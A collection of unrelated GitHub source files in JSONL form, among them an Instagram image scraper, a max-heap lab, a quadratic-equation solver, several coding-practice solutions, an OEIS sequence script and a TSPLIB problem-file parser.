})\n self._save_config()\n\n logging.basicConfig(filename=os.path.join(scrape_folder, 'scraping_log.txt'),\n format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',\n datefmt='%H:%M:%S', level=logging.DEBUG)\n self.logger = logging.getLogger(__name__)\n\n self.sleep_time = sleep_time\n\n def get_image(self, image_url):\n try:\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n r = requests.get(image_url, headers=headers)\n r.raise_for_status() # raises an HTTPError if an error has occurred during the request (e.g. 
404)\n return r.content\n except requests.exceptions.HTTPError as errh:\n self.logger.error(\"Http error: {}\".format(errh))\n self.logger.error(\"Error message: {}\".format(errh.response.content.decode()))\n except requests.exceptions.ConnectionError as errc:\n self.logger.error(\"Connection error: {}\".format(errc))\n except requests.exceptions.Timeout as errt:\n self.logger.error(\"Connection error: {}\".format(errt))\n except requests.exceptions.RequestException as errr:\n self.logger.error(\"Oops: Something Else: {}\".format(errr))\n return None\n\n def scrape(self, *args, **kwargs):\n while not self.get_scrape_status(do_print=True) == STATUS_FINISHED:\n for post_id in tqdm(self._get_undone_posts(), desc=\"Scraping round progress\"):\n scrape_success = False\n\n # get post info\n shortcode = self.config.loc[self.config[\"post_id\"] == post_id, \"shortcode\"].item()\n image_url = self.config.loc[self.config[\"post_id\"] == post_id, \"image_url\"].item()\n\n # skip post if it already exists on the disk\n fpath = os.path.join(self.image_folder, \"{}_{}.jpg\".format(post_id, shortcode))\n if os.path.exists(fpath) and self.skip_if_exists:\n # print(fpath, \"already exists\")\n self._increment_config(post_id, \"image_scraped\")\n scrape_success = True\n continue # will go into 'finally' block\n\n # attempt to scrape the image\n self.logger.info(create_log_msg(shortcode, \"Extracting image content...\"))\n self._increment_config(post_id, \"image_attempts\")\n ####\n ## Alternate version of the image url that doesn't expire. I have not tested this a lot so if it fails use the image url stored in thes crape data (i.e. comment the below line out)\n image_url = \"https://www.instagram.com/p/{}/media/?size=l\".format(shortcode)\n ####\n img = get_image(image_url)\n if img is not None:\n with open(fpath, \"wb\") as f:\n f.write(img)\n self._increment_config(post_id, \"image_scraped\")\n scrape_success = True\n else:\n print(\"error on post with shortcode=\", shortcode)\n time.sleep(self.sleep_time)\n print(\"Scraped post {}, result: {}\".format(shortcode, \"success\" if scrape_success else \"fail\"))\n self._save_config()\n\n # for s in tqdm(range(300),\n # desc=\"Short break between scrape rounds to wait for temporarily unavailable posts to come back\"):\n # time.sleep(1)\n\n print(\"Images saved to {}\".format(self.image_folder))\n print(\"unscraped posts:\", self._get_undone_posts(shortcode=True))\n print(\"This scrape is complete. 
To re-do it, please create a new one in a different folder.\")\n\n    def _read_config(self):\n        self.config = pd.read_csv(self.config_file)\n\n    def _save_config(self):\n        self.config.to_csv(self.config_file, index=False)\n\n    def _increment_config(self, post_id, variable):\n        self.config.loc[self.config[\"post_id\"] == post_id, variable] += 1\n        self._save_config()\n\n    def _get_image_done(self, df):\n        \"\"\"\n        returns the posts whose image data has been either scraped or has exceeded the max number of attempts\n        \"\"\"\n        return df[(df[\"image_scraped\"] == 1) | (df[\"image_attempts\"] >= df[\"max_attempts\"])]\n\n    def _get_undone_posts(self, shortcode=False):\n        df_done = self._get_image_done(self.config)\n        keyword = \"shortcode\" if shortcode else \"post_id\"\n        return list(self.config[~self.config.index.isin(df_done.index)][keyword])\n\n    def get_scrape_status(self, do_print=False):\n        \"\"\"\n        rows: posts\n        columns: total (all), done (scraped or failed), scraped (successfully scraped), failed (scraping failed more times than max_attempts allows)\n        used to view the scrape progress\n        \"\"\"\n\n        df = self.config\n\n        data = [\n            [len(df)],\n            [len(self._get_image_done(df))],\n            [len(df[df[\"image_scraped\"] == 1])],\n            [len(df[df[\"image_attempts\"] >= df[\"max_attempts\"]])]\n        ]\n        res = pd.DataFrame(data=data, columns=[\"images\"], index=[\"total\", \"done\", \"scraped\", \"failed\"])\n\n        if do_print:\n            print(\"Scrape status:\")\n            print(res)\n\n        done = res.at[\"done\", \"images\"] == res.at[\"total\", \"images\"]\n        if done:\n            if do_print:\n                print(\"unscraped posts:\", self._get_undone_posts(shortcode=True))\n            status = STATUS_FINISHED\n        else:\n            status = STATUS_UNFINISHED\n        print(\"scrape status:\", status)\n        return status\n\n    def combine_scrape_results(self, skip_if_exists=True, *args, **kwargs):\n        # not needed for images\n        pass\n\n\ndef do_scrape(output_folder, scrape_names, input_table_files):\n    \"\"\"\n    Manages multiple consecutive scrapes\n    :param output_folder: path to store the scraped data at (sub-folder for each scrape will be created automatically)\n    :param scrape_names: list of scrape names, from which the scrape folders will be constructed\n    :param input_table_files: input table for each scrape (which is the output table of the feed scrape)\n    \"\"\"\n    for i, scrape_name in enumerate(scrape_names):\n        # contains posts to be scraped\n        df_in = pd.read_csv(input_table_files[i])\n\n        scrape_folder = os.path.join(output_folder, scrape_name)\n\n        # filter df_in to only include images that should be scraped\n        if \"scrape_image\" in df_in.columns:\n            df_in = df_in[df_in[\"scrape_image\"] == True]\n\n        post_ids = list(df_in[\"id\"])\n        post_shortcodes = list(df_in[\"shortcode\"])\n        image_urls = list(df_in[\"thumbnail_src\"])\n        # bundle the three parallel lists the way InstagramImageScraper.__init__ unpacks them\n        posts = (post_ids, post_shortcodes, image_urls)\n\n        scraper = InstagramImageScraper(scrape_folder, posts, sleep_time=0, max_attempts=5)\n        status = scraper.get_scrape_status()\n\n        if status == STATUS_UNFINISHED:\n            scraper.scrape()\n\n\nif __name__ == \"__main__\":\n    casestudy = \"Dublin_GCT\"\n\n    scrape_name = casestudy\n    input_table = \"../../../data/IconicityStudies/Feed_preprocessed/{}/{}_metadata.csv\".format(casestudy, casestudy)\n    output_folder = \"../../../data/IconicityStudies/Images\"\n    do_scrape(output_folder, [scrape_name], [input_table])\n","repo_name":"solfang/Social-Media-Data-Pipeline","sub_path":"Scraper/RapidAPI/InstagramImageScraper.py","file_name":"InstagramImageScraper.py","file_ext":"py","file_size_in_byte":10197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32153121454","text":"\"\"\"Contains code for Max Heap\nCPE 202\nAuthor: Adrian Abarca\n\"\"\"\n\n
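# Array-heap layout: parent(i) = (i - 1) // 2, left(i) = 2*i + 1, right(i) = 2*i + 2.\n# e.g. in [9, 5, 8, 1, 2], the children of 9 (index 0) sit at indices 1 and 2, and the\n# parents of indices 3 and 4 are both index 1.\n\n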
def insert(arr, item, end):\n    \"\"\"inserts an item to the heap\n    Args:\n        arr (list): heap array\n        item (int): item you want to add\n        end (int): end of the max heap\n    Returns:\n        list: heap after item was inserted\n    Raises:\n        IndexError: if end is None or already the end of the list\n    \"\"\"\n    if end is None or end == (len(arr)-1):\n        raise IndexError\n    arr[end+1] = item\n    shift_up(arr, end+1)\n    return arr\n\ndef del_max(arr, end=None):\n    \"\"\"deletes the max item in the heap\n    Args:\n        arr (list): heap array\n        end (int): end of the heap\n    Returns:\n        list: arr after deleting max\n        int: max value that was deleted\n        int: end of the list\n    \"\"\"\n    if end is None:\n        end = len(arr) - 1\n    max_val = arr[0]\n    arr[0] = arr[end]\n    shift_down(arr, 0, end-1)\n    return arr, max_val, end-1\n\ndef shift_up(arr, index):\n    \"\"\"shifts up item at index\n    Args:\n        arr (list): heap array\n        index (int): index of item you want to shift up\n    \"\"\"\n    idxparent = index_parent(index)\n    if idxparent < 0 or arr[idxparent] is None:\n        return\n    if arr[idxparent] >= arr[index]:\n        return\n    # swap the item with its parent and keep sifting up\n    temp = arr[index]\n    arr[index] = arr[idxparent]\n    arr[idxparent] = temp\n    return shift_up(arr, idxparent)\n\ndef shift_down(arr, index, end):\n    \"\"\"shifts down item at index\n    Args:\n        arr (list): heap array\n        index (int): index of item you want to shift down\n        end (int): end of the heap array\n    \"\"\"\n    max_idx = index_maxchild(arr, index, end)\n    if max_idx < 0:\n        return None\n    if arr[max_idx] is None or arr[index] >= arr[max_idx]:\n        return None\n    # swap the item with its larger child and keep sifting down\n    temp = arr[index]\n    arr[index] = arr[max_idx]\n    arr[max_idx] = temp\n    return shift_down(arr, max_idx, end)\n    \ndef heapify(arr):\n    \"\"\"heapifies an arr\n    Args:\n        arr (list): heap array\n    Returns:\n        list: array that has been heapified\n    \"\"\"\n    length = len(arr)\n    idx = index_parent(length - 1)\n    while idx >= 0:\n        shift_down(arr, idx, length - 1)\n        idx = idx - 1\n    return arr\n\ndef index_parent(idx):\n    \"\"\"computes parent of an index\n    Args:\n        idx (int): index of item you want to find parent of\n    Returns:\n        int: index of the parent\n    \"\"\"\n    return (idx - 1) // 2\n\ndef index_left(idx):\n    \"\"\"computes left child of an index\n    Args:\n        idx (int): index of item you want to find left child\n    Returns:\n        int: index of the left child of the index node\n    \"\"\"\n    return 2 * (idx) + 1\n\ndef index_right(idx):\n    \"\"\"computes right child of an index\n    Args:\n        idx (int): index of item you want to find right child\n    Returns:\n        int: index of the right child of the index node\n    \"\"\"\n    return 2 * (idx) + 2\n\ndef index_maxchild(arr, idx, end):\n    \"\"\"computes the larger child of an index\n    Args:\n        arr (list): heap array\n        idx (int): index whose larger child is wanted\n        end (int): end index of heap array\n    Returns:\n        int: index of the larger child, or -1 if idx has no child within end\n    \"\"\"\n    left = index_left(idx)\n    right = index_right(idx)\n    if left > end or arr[left] is None:\n        return -1\n    if right > end or arr[right] is None or arr[left] > arr[right]:\n        return left\n    return right\n","repo_name":"adrianabarca42/CPE-202","sub_path":"lab6 - Heap Sort/max_heap.py","file_name":"max_heap.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"13176476192","text":"import os\nimport pandas as pd\n\nfrom settings import INPUTS_PATH\n\ndef gen_mixed_freq_dataset():\n df = pd.read_csv(os.path.join(INPUTS_PATH, \"mixed_freq_raw_df.csv\"))\n df.index = pd.to_datetime(df[\"date\"])\n df.set_index(\"date\", inplace=True)\n df = df.sort_index()\n\n out_list = []\n for colname in df.columns:\n tmp_df = df[[colname]].dropna()\n tmp_df = tmp_df / (tmp_df).shift(1) - 1\n\n out_list.append(tmp_df)\n out_df = pd.concat(out_list, axis=1)\n\n out_df.to_csv(os.path.join(INPUTS_PATH, \"mixed_freq_df.csv\"))\n\n\nif __name__ == \"__main__\":\n gen_mixed_freq_dataset()\n \n\n\n\n","repo_name":"dcuoliveira/few-shot-learning-ts","sub_path":"src/gen_mixed_freq_dataset.py","file_name":"gen_mixed_freq_dataset.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"4016958856","text":"import plotly.graph_objects as go\n\ndef plotly_plot_bivariate_normal_pdf(x, y, z, name=\"\"):\n fig = go.Figure(data=[go.Surface(x=y, y=x, z=z)])\n fig.update_traces(contours_z=dict(show=True, \n usecolormap=True,\n highlightcolor=\"limegreen\", \n project_z=True))\n fig.update_layout(title=name, autosize=False,\n scene_camera_eye=dict(x=1.5, y=-1.5, z=1.5),\n width=1200, height=600,\n margin=dict(l=50, r=50, b=50, t=50))\n fig.show()","repo_name":"AnaviaD/BlenderPythonProjects","sub_path":"JustPython/plotly_plot_bivariate_normal_pdf.py","file_name":"plotly_plot_bivariate_normal_pdf.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35122279006","text":"# https://practice.geeksforgeeks.org/problems/anagram-palindrome4720/1/#\n\n\nclass Solution:\n def isPossible(self, S):\n # code here\n d_chars = {}\n for c in S:\n d_chars.setdefault(c, 0)\n d_chars[c] += 1\n\n odd = 0\n for _, v in d_chars.items():\n if v % 2 != 0:\n odd += 1\n\n if odd > 1:\n return False\n return True\n\n\nif __name__ == '__main__':\n s = 'geeksogeeks'\n s = 'geeksforgeeks'\n print(Solution().isPossible(s))\n","repo_name":"hdthuc93/dsa_practice","sub_path":"anagram_palindrome.py","file_name":"anagram_palindrome.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42097578014","text":"# Once upon a time, in a kingdom far, far away, there lived a King Byteasar II. There was nothing special about him or his kingdom. As a mediocre ruler, he preferred hunting and feasting over doing anything about his kingdom's prosperity.\n\n# Luckily, his adviser, the wise magician Bitlin, worked for the kingdom's welfare day and night. However, since there was no one to advise him, he completely forgot about one important thing: the roads! Over the years most of the two-way roads built by Byteasar's predecessors were forgotten and no longer traversable. Only a few roads can still be used.\n\n# Bitlin wanted each pair of cities to be connected, but couldn't find a way to figure out which roads are missing. Desperate, he turned to his magic crystal ball for help. The crystal showed him a programmer from the distant future: you! Now you're the only one who can save the kingdom. Given the existing roads and the number of cities in the kingdom, you should use the most modern technologies and find out which roads should be built again to connect each pair of cities. 
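(In graph terms: the existing roads form a graph on the given number of cities, and the roads to build are exactly the edges of its complement.) 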
Since the crystal ball is quite old and meticulous, it will only transfer the information if it is sorted properly.\n\n# The roads to be built should be returned in an array sorted lexicographically, with each road stored as [cityi, cityj], where cityi < cityj.\n\n# Example\n\n# For cities = 4 and roads = [[0, 1], [1, 2], [2, 0]],\n# the output should be\n# solution(cities, roads) = [[0, 3], [1, 3], [2, 3]].\n\n# See the image below: the existing roads are colored black, and the ones to be built are colored red.\n\ndef solution(cities, roads):\n all_roads = [[None for j in range(cities)]\n for i in range(cities)]\n\n for i in range(len(roads)):\n for j in range(len(roads[i]) - 1):\n row = roads[i][j]\n col = roads[i][j + 1]\n all_roads[row][col] = True\n all_roads[col][row] = True\n\n print('allroads', all_roads)\n\n missing_roads = []\n for i in range(cities):\n for j in range(cities):\n road_pair = []\n print(i, j, all_roads[i][j])\n if i != j and all_roads[i][j] == None:\n road_pair.append(i)\n road_pair.append(j)\n all_roads[j][i] = True\n missing_roads.append(road_pair)\n\n return missing_roads\n\n\ns = solution(4, [[0, 1],\n [1, 2],\n [2, 0]])\nprint(s)\n","repo_name":"thiagobrunoms/coding","sub_path":"mix/codesignal/graphs_arcades/roads_building.py","file_name":"roads_building.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"2087811985","text":"import scipy.io as scio\r\nimport numpy as np\r\n\r\n\r\ndef DFT_gen(dft_mode):\r\n if dft_mode == 'dft':\r\n dft_mtx = scio.loadmat('./DFT_matrices/dft_16.mat')['W_UPA'] # columns are DFT bf vectors\r\n elif dft_mode == 'dft_corrupted':\r\n dft_mtx = scio.loadmat('./DFT_matrices/dft_16_corrupted.mat')['W_UPA_corrupted'] # columns are DFT bf vectors\r\n else:\r\n dft_mtx = 0\r\n ValueError('please check DFT mode.')\r\n num_beam = dft_mtx.shape[1]\r\n num_ant = dft_mtx.shape[0]\r\n dft_mtx_r = np.real(dft_mtx)\r\n dft_mtx_i = np.imag(dft_mtx)\r\n dft_cat = np.zeros((num_beam, 2 * num_ant))\r\n for ii in range(num_beam):\r\n for jj in range(num_ant):\r\n dft_cat[ii, 2*jj] = dft_mtx_r[jj, ii]\r\n dft_cat[ii, 2*jj+1] = dft_mtx_i[jj, ii]\r\n\r\n return dft_cat\r\n\r\n# dft_mtx = load_file['W_UPA']\r\n# a = DFT_gen()\r\n# pp = 1\r\n","repo_name":"YuZhang-GitHub/Codebook_Learning_RL","sub_path":"DFT_gen.py","file_name":"DFT_gen.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"} +{"seq_id":"74180987300","text":"#User function Template for python3\n\nclass Solution:\n def diagonalSort(self, matrix, n, m):\n # code here\n lft=[]\n up=[]\n dg=[]\n for i in range(1,n):\n st=i\n en=0\n ans=[]\n while(0<=en 0:\n n, m = map(int, input().strip().split())\n inputLine = list(map(int, input().strip().split()))\n matrix = [[0 for j in range(m)] for i in range(n)]\n for i in range(n):\n for j in range(m):\n matrix[i][j] = inputLine[i * m + j]\n ob=Solution()\n ob.diagonalSort(matrix,n,m)\n for i in range(n): \n for j in range(m): \n print(matrix[i][j], end =' ') \n print() \n tc-=1\n\n# } Driver Code Ends","repo_name":"AyushAgnihotri2025/CP-Solutions","sub_path":"GeeksforGeeks/Python3/Medium/Sort a 2D vector diagonally/sort-a-2d-vector-diagonally.py","file_name":"sort-a-2d-vector-diagonally.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} 
+{"seq_id":"12893485500","text":"numerosEnPalabras ={\n    \"0\": \"cero\",\n    \"1\": \"uno\",\n    \"2\": \"dos\",\n    \"3\": \"tres\",\n    \"4\": \"cuatro\",\n    \"5\": \"cinco\",\n    \"6\": \"seis\",\n    \"7\": \"siete\",\n    \"8\": \"ocho\",\n    \"9\": \"nueve\"\n}\n\ntexto = input(\"enter a number to see how it is written in Spanish \")\n# so that numbers with two or more digits also work without an error\ntextoFinalEnUnaSolaLinea=''\nfor letra in texto:\n    textoFinalEnUnaSolaLinea += numerosEnPalabras[letra] + ' '\n\nprint(textoFinalEnUnaSolaLinea)\nprint(\"bye\")","repo_name":"profsofia/python","sub_path":"arreglos.py","file_name":"arreglos.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72137951780","text":"import math\r\nclass Cuadratica:\r\n    tipo_raiz = 0\r\n    disc = 0\r\n    def __init__(self, a, b, c):\r\n        self.a = a\r\n        self.b = b\r\n        self.c = c\r\n        self.discriminante()\r\n    def discriminante(self):\r\n        if self.a != 0:\r\n            self.disc = ((self.b ** 2) - (4 * self.a * self.c))\r\n            if self.disc == 0:\r\n                self.tipo_raiz = 0\r\n            elif self.disc > 0:\r\n                self.tipo_raiz = 1\r\n            else:\r\n                self.tipo_raiz = -1\r\n        else:\r\n            print(\"Not a quadratic equation, since the coefficient of x^2 is 0\")\r\n    def solucion(self):\r\n        if(self.tipo_raiz==0):\r\n            self.raices_iguales()\r\n        elif(self.tipo_raiz==1):\r\n            self.raices_normales()\r\n        else:\r\n            self.raices_imaginarias()\r\n    def raices_iguales(self):\r\n        x1 = x2 = (-self.b / (2 * self.a))\r\n        print(\"The discriminant is zero, so there is a single solution.\")\r\n        print(\"The result of the equation is: \")\r\n        print(\"x1 = \", x1)\r\n        print(\"x2 = \", x2)\r\n    def raices_normales(self):\r\n        x1 = ((-self.b - math.sqrt(self.disc)) / (2 * self.a))\r\n        x2 = ((-self.b + math.sqrt(self.disc)) / (2 * self.a))\r\n        print(\"The discriminant is greater than zero, so there are two real solutions.\")\r\n        print(\"The result of the equation is:\")\r\n        print(\"x1 = \", x1)\r\n        print(\"x2 = \", x2)\r\n    def raices_imaginarias(self):\r\n        real = -self.b / (2 * self.a)\r\n        imag = math.sqrt(-self.disc) / (2 * self.a)\r\n        print(\"The discriminant is less than zero, so there are two complex solutions.\")\r\n        print(\"The result of the equation is:\")\r\n        print(\"x1 = \", real, \" + \", imag, \" i \")\r\n        print(\"x2 = \", real, \" - \", imag, \" i \")\r\n\r\n\r\nprint(\"Program to compute the solutions of an equation of the form ax^2+bx+c=0\")\r\nprint(\"----------------------------------------------------------------------------------------------\")\r\nwhile True:\r\n    print(\"Enter the values of the coefficients (a, b and c) of the equation\")\r\n    print(\"Remember that the coefficient of x^2 must be different from 0\")\r\n    while True:\r\n        a = float(input(\"a: \"))\r\n        if(a != 0):\r\n            break\r\n    b = float(input(\"b: \"))\r\n    c = float(input(\"c: \"))\r\n    respuesta = Cuadratica(a,b,c)\r\n    respuesta.solucion()\r\n    cerrar = input(\"Enter 0 to quit: \")\r\n    if cerrar == \"0\":\r\n        break\r\n","repo_name":"EstebanOG/Ejercicios_Python","sub_path":"POO/ecuacion_cuadratica.py","file_name":"ecuacion_cuadratica.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70427312742","text":"divm = 11\nn = 11\nlast = 10**n\nssts = []\ndebug = 0\n\ndef setgoodlist(len, adiv):\n    atmp = [0,1,2,3,4,5,6,7,8,9]\n    btmp = [0,1,2,3,4,5,6,7,8,9]\n    for i in atmp:\n        remain = (adiv - i*(10 **(len-1))) % adiv\n        if (adiv - 10*remain) % adiv > 9:\n            btmp.remove(i)\n    if debug > 0:\n            
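# debug levels: debug > 0 prints the surviving digit list here; debug >= 2 also traces dropdigs/walking below\n            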
print(\"btmp=\" + str(btmp));\n return btmp\n\ndef dropdigs(k,l):\n ktmp = (k // l) * l\n ktmp -= 1\n while (ktmp % divm) != 0:\n ktmp -= 1\n if debug >= 2:\n print(\"dropdigs(\" + str(k) + \",\" + str(l) + \" -> \" + str(ktmp))\n return ktmp\n\ndef walking(k):\n aa = 0\n kt = k*10\n ktl = kt % last\n if debug >= 2:\n print(\"walk in(\" + str(k) + \"), last=\" + str(last) + \", ktl=\" + str(ktl))\n if ((ktl - 1) % divm) + 10 < divm:\n if debug >= 2:\n print(\"walk premature(\" + str(k) + \"), aa=\" + str(aa))\n return aa\n if ktl % divm == 0:\n a = kt\n else:\n a = kt + (divm - (ktl % divm))\n\n al = a % last\n if al not in ssts:\n if debug >= 2:\n print(\"walk !contains(\" + str(al) + \"), a=\" + str(a))\n ssts.append(al)\n aa = max(aa,a)\n atmp = walking(a)\n aa = max(aa,atmp)\n ssts.remove(al)\n else:\n if debug >= 2:\n print(\"walk contains(\" + str(al) + \"), a=\" + str(a))\n if debug >= 2:\n print(\"walk out(\" + str(k) + \") -> \" + str(aa))\n return aa\n \n\nfor n in range(1,16):\n goodlist = setgoodlist(n,divm)\n last = 10**n\n beg = int(n*'9')\n end = int((n-1)*\"9\")\n i = beg\n while i % divm != 0:\n i -= 1\n if debug >= 2:\n print (\"i=\" + str(i) + \", n=\" + str(n) + \", beg=\" + str(beg) + \", end=\" + str(end))\n an = i\n oldan = an\n anlen = n\n while i > end:\n ssts = [i]\n if i % 100000 == 0:\n anlen = len(str(an))\n if anlen > 2*n:\n anlen = 2*n - 1\n an = max(an,walking(i))\n i -= divm\n for j in range(anlen - n+1):\n jten = 10 ** (n - j-1)\n if jten < 1:\n break\n while (i // jten) % 10 not in goodlist:\n i = dropdigs(i,jten)\n print(str(n) + \" \" + str(an))\n","repo_name":"gfis/OEIS-mat","sub_path":"contrib/A093211.py","file_name":"A093211.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"13124443519","text":"\"\"\"Parser, file loader and container factory.\n\"\"\"\nfrom typing import Tuple, Union\nimport re\nimport gzip\n\nimport numpy as np\n\nfrom .exceptions import BadTspFile, ParsingError, UnsupportedEdgeWeight\nfrom .constants import ProblemType, EdgeWeightType, EdgeWeightFormat, EdgeDataFormat, NodeCoordinateType, DisplayDataType\nfrom .containers import Solution, Problem\nfrom .metrics import Euclidean, AttPseudoEuclidean, CeilEuclidean, Geographical, Manhattan, MaximumLinf\n\n\n\ndef parse_to_dict(filename: str, force_gzip: bool=False) -> Tuple[dict,dict]:\n \"\"\"Load a TSPLIB file and construct a Problem or Tour object.\n\n Parameters\n ----------\n filename : str\n Filename to load. If the filename ends with .gz then we will assume it's GZIP'd. This can\n be overridden with the force_gzip option.\n force_gzip : bool, optional\n If True, then the reader will assume the file is gzipped, otherwise it will try to figure it\n out for itself. 
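(The check keys off a '.gz' filename suffix.) 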
Optional, default is False.\n\n Returns\n -------\n Tuple[dict,dict]\n Tuple containing the specification dictionary and the data dictionary.\n\n Raises\n ------\n BadTspFile\n If there is an internal problem with the TSPLIB file.\n ParsingError\n If the parser has become lost and cannot continue parsing.\n \"\"\"\n # Dictionaries to store the return data.\n specification = {'comments':[]}\n data = {}\n\n # These enumeration mappings simplify our parsing by searching for TSPLIB file strings\n # and matching them to the appropriate enum.\n _edge_weight_type_map = {_x.value:_x for _x in EdgeWeightType}\n _problem_type_map = {_x.value:_x for _x in ProblemType}\n _edge_weight_format_map = {_x.value:_x for _x in EdgeWeightFormat}\n\n # Select the correct file handler: standard i/o or gzip.\n file_handler = open\n if filename[-3:]=='.gz' or force_gzip==True:\n file_handler = gzip.open\n\n # Process each line in the file. This operates as a state machine and defaults to\n # searching for specification data.\n with file_handler(filename,'rt') as fh:\n state = 'specification'\n\n for _buffer in fh:\n buffer = _buffer.strip()\n\n if len(buffer)>0:\n # If we are in a specification state then search for\n # a specification string.\n if state=='specification':\n\n g = re.search('(\\w+)\\s*:\\s*([\\s\\S]+)',buffer)\n if g is not None:\n token = g.group(1)\n content = g.group(2).strip()\n\n if token=='NAME':\n specification['name'] = content\n\n elif token=='TYPE':\n if content=='TOUR':\n specification['type'] = 'TOUR'\n else:\n if content in _problem_type_map:\n specification['type'] = _problem_type_map[content]\n else:\n raise BadTspFile('Unknown type of TSPLIB file <{}>'.format(content))\n\n elif token=='COMMENT':\n specification['comments'].append(content)\n\n elif token=='CAPACITY':\n specification['capacity'] = float(content)\n\n elif token=='DIMENSION':\n specification['dimension'] = int(content)\n\n elif token=='EDGE_WEIGHT_TYPE':\n if content in _edge_weight_type_map:\n specification['edge_weight_type'] = _edge_weight_type_map[content]\n else:\n raise BadTspFile('Unknown edge weight type in TSPLIB file <{}>'.format(content))\n\n elif token=='EDGE_WEIGHT_FORMAT':\n if content in _edge_weight_format_map:\n specification['edge_weight_format'] = _edge_weight_format_map[content]\n else:\n raise BadTspFile('Unknown edge weight format in TSPLIB file <{}>'.format(content))\n\n elif token=='EDGE_DATA_FORMAT':\n if content=='EDGE_LIST':\n specification['edge_data_format'] = EdgeDataFormat.EDGE_LIST\n elif content=='ADJ_LIST':\n specification['edge_data_format'] = EdgeDataFormat.ADJ_LIST\n else:\n raise BadTspFile('Unknown edge data format in TSPLIB file <{}>'.format(content))\n\n elif token=='NODE_COORD_TYPE':\n if content=='TWOD_COORDS':\n specification['node_coord_type'] = NodeCoordinateType.TWOD\n elif content=='THREED_COORDS':\n specification['node_coord_type'] = NodeCoordinateType.THREED\n elif content=='NO_COORDS':\n specification['node_coord_type'] = NodeCoordinateType.NO_COORDINATES\n else:\n raise BadTspFile('Unknown node coordinate type in TSPLIB file <{}>'.format(content))\n\n elif token=='DISPLAY_DATA_TYPE':\n if content=='COORD_DISPLAY':\n specification['display_data_type'] = DisplayDataType.COORD_DISPLAY\n elif content=='TWOD_DISPLAY':\n specification['display_data_type'] = DisplayDataType.TWOD_DISPLAY\n elif content=='NO_DISPLAY':\n specification['display_data_type'] = DisplayDataType.NO_DISPLAY\n else:\n raise BadTspFile('Unknown display data type in TSPLIB file <{}>'.format(content))\n\n 
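# any specification keyword not matched above is treated as fatal rather than skipped\n                        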
else:\n raise BadTspFile('Unknown keyword in TSPLIB file <{}>'.format(token))\n\n elif buffer=='NODE_COORD_SECTION':\n state = 'node_coords_data'\n data['node_coords'] = {}\n\n elif buffer=='DEPOT_SECTION':\n state = 'depot_node_data'\n data['depot_node'] = []\n\n elif buffer=='DEMAND_SECTION':\n state = 'demand_data'\n data['demand'] = {}\n\n elif buffer=='EDGE_DATA_SECTION':\n state = 'edge_data'\n data['edge'] = {}\n\n elif buffer=='FIXED_EDGES_SECTION':\n state = 'fixed_edge_data'\n data['fixed_edges'] = {}\n\n elif buffer=='DISPLAY_DATA_SECTION':\n state = 'display_data'\n data['display'] = {}\n\n elif buffer=='TOUR_SECTION':\n state = 'tour_data'\n data['tour'] = []\n\n elif buffer=='EDGE_WEIGHT_SECTION':\n state = 'edge_weight_data'\n data['edge_weights'] = []\n\n elif buffer=='EOF':\n state='done'\n\n elif (state=='node_coords_data' or state=='depot_node_data' or state=='demand_data' or state=='edge_data'\n or state=='fixed_edge_data' or state=='display_data' or state=='tour_data' or state=='edge_weight_data'):\n\n if buffer=='NODE_COORD_SECTION':\n if 'node_coords' in data:\n raise BadTspFile('Duplicate node coordinate data in TSPLIB file')\n state = 'node_coords_data'\n data['node_coords'] = {}\n\n elif buffer=='DEPOT_SECTION':\n if 'depot_node' in data:\n raise BadTspFile('Duplicate debot node data in TSPLIB file')\n state = 'depot_node_data'\n data['depot_node'] = []\n\n elif buffer=='DEMAND_SECTION':\n if 'demand' in data:\n raise BadTspFile('Duplicate demand data in TSPLIB file')\n state = 'demand_data'\n data['demand'] = {}\n\n elif buffer=='EDGE_DATA_SECTION':\n if 'edge' in data:\n raise BadTspFile('Duplicate edge data in TSPLIB file')\n state = 'edge_data'\n data['edge'] = {}\n\n elif buffer=='FIXED_EDGES_SECTION':\n if 'fixed_edges' in data:\n raise BadTspFile('Duplicate fixed edge data in TSPLIB file')\n state = 'fixed_edge_data'\n data['fixed_edges'] = {}\n\n elif buffer=='DISPLAY_DATA_SECTION':\n if 'display' in data:\n raise BadTspFile('Duplicate display data in TSPLIB file')\n state = 'display_data'\n data['display'] = {}\n\n elif buffer=='TOUR_SECTION':\n if 'tour' in data:\n raise BadTspFile('Duplicate tour data in TSPLIB file')\n state = 'tour_data'\n data['tour'] = []\n\n elif buffer=='EDGE_WEIGHT_SECTION':\n if 'edge_weight' in data:\n raise BadTspFile('Duplicate edge weight data in TSPLIB file')\n state = 'edge_weight_data'\n data['edge_weights'] = []\n\n elif buffer=='EOF':\n state = 'done'\n\n else:\n if buffer=='-1':\n state = 'specification'\n\n elif state=='node_coords_data':\n if 'node_coord_type' not in specification:\n specification['node_coord_type'] = NodeCoordinateType.TWOD\n tmp = buffer.split()\n if specification['node_coord_type']==NodeCoordinateType.TWOD:\n data['node_coords'][int(tmp[0])] 